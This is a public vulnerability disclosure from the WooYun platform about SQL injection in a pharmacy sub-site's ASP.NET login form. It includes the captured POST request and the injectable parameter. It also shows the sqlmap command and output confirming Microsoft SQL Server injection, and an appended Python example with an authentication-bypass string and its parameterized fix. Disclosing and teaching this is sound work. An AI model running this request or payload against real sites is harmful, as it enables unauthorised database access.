
Vulnerability Summary

Defect ID: wooyun-2015-0138163

Title: SQL injection vulnerability in another Heping Pharmacy (和平药房) sub-site

Vendor: hp1997.com

Author: 路人甲

Submitted: 2015-08-31 15:24

Fix deadline: 2015-09-05 15:26

Published: 2015-09-05 15:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor notified of the vulnerability, but the vendor ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-08-31: Details sent to the vendor, awaiting vendor handling
2015-09-05: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Injection

Detailed description:

http://www.cqpds.com.cn/

Note the domain: this is a different sub-site from the earlier report, with different content.
Proof:

[image: 1.jpg]

[image: 2.jpg]

POST injection

POST /Menu.aspx HTTP/1.1
Host: www.cqpds.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: http://www.cqpds.com.cn/
Content-Length: 4446
Cookie: CNZZDATA408690=cnzz_eid%3D1845074286-1440228084-%26ntime%3D1440992773; ASP.NET_SessionId=keglaoeypbebfvedb1v1bkie
Connection: keep-alive
Pragma: no-cache


The POST parameter ctl00%24ContentPlaceHolder1%24Login1%24UserName (the login form's user name field) is injectable.

Proof of vulnerability:

python sqlmap.py -r 1.txt -p ctl00%24ContentPlaceHolder1%24Login1%24UserName
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150803}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:12:34

[16:12:34] [INFO] parsing HTTP request from '1.txt'
[16:12:34] [INFO] testing connection to the target URL
[16:12:35] [INFO] testing if the target URL is stable
[16:12:35] [INFO] target URL is stable
[16:12:36] [WARNING] heuristic (basic) test shows that POST parameter 'ctl00$ContentPlaceHolder1$Login1$UserName' might not be injectable
[16:12:36] [INFO] testing for SQL injection on POST parameter 'ctl00$ContentPlaceHolder1$Login1$UserName'
[16:12:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:12:37] [WARNING] reflective value(s) found and filtering out
[16:12:48] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[16:12:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:12:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:12:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[16:12:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:12:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[16:13:00] [INFO] testing 'MySQL inline queries'
[16:13:00] [INFO] testing 'PostgreSQL inline queries'
[16:13:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:13:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[16:13:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[16:13:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:13:16] [INFO] POST parameter 'ctl00$ContentPlaceHolder1$Login1$UserName' seems to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable
it looks like the back-end DBMS is '['Microsoft SQL Server', 'Sybase']'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for '['Microsoft SQL Server', 'Sybase']' extending provided level (1) and risk (1) values? [Y/n] n
[16:13:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[16:13:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:13:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:13:49] [INFO] target URL appears to be UNION injectable with 4 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[16:14:33] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[16:14:33] [INFO] checking if the injection point on POST parameter 'ctl00$ContentPlaceHolder1$Login1$UserName' is a false positive
POST parameter 'ctl00$ContentPlaceHolder1$Login1$UserName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 108 HTTP(s) requests:
[16:15:15] [INFO] testing Microsoft SQL Server
[16:15:15] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[16:15:32] [INFO] confirming Microsoft SQL Server
[16:15:43] [INFO] adjusting time delay to 2 seconds due to good response times
[16:15:45] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[16:15:45] [INFO] fetched data logged to text files under
[*] shutting down at 16:15:45


Because the run was slow, only a few tables were enumerated:

[image: 3.jpg]
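The defect class behind this finding and the fix the report's empty fix section leaves out, as an added example that is not part of the original report: a login check that splices the UserName, Password and DropDownList_Class values into the SQL text, beside the same check with bound parameters. An in-memory SQLite table stands in for the site's SQL Server database; the schema, rows and field names are assumptions.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the application's user table (assumed schema/rows).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, class TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret', 'A')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password, user_class="A"):
    # The pattern sqlmap's stacked-query and UNION findings point to: form
    # fields are concatenated into the statement, so quotes in the user name
    # end the string literal and the rest of the value is parsed as SQL.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username
           + "' AND password = '" + password
           + "' AND class = '" + user_class + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn, username, password, user_class="A"):
    # Hardened form: placeholders are bound by the driver, so the user name is
    # compared as data and can never change the statement's structure.
    sql = ("SELECT COUNT(*) FROM users "
           "WHERE username = ? AND password = ? AND class = ?")
    return conn.execute(sql, (username, password, user_class)).fetchone()[0] > 0


def demo():
    # Constructed inputs: valid credentials, and a user name carrying a quote
    # with a tautology so the concatenated query matches regardless of password.
    conn = make_db()
    quoted_name = "admin' OR '1'='1"
    return {
        "vuln_valid": login_vulnerable(conn, "admin", "s3cret"),
        "vuln_bypass": login_vulnerable(conn, quoted_name, "wrong"),
        "param_valid": login_parameterized(conn, "admin", "s3cret"),
        "param_bypass": login_parameterized(conn, quoted_name, "wrong"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

With the concatenated query the quoted name logs in without the password; with bound parameters the same value is simply a non-existent user name.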


Fix recommendation:

Copyright notice: when reposting, please credit the source, 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-09-05 15:26

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet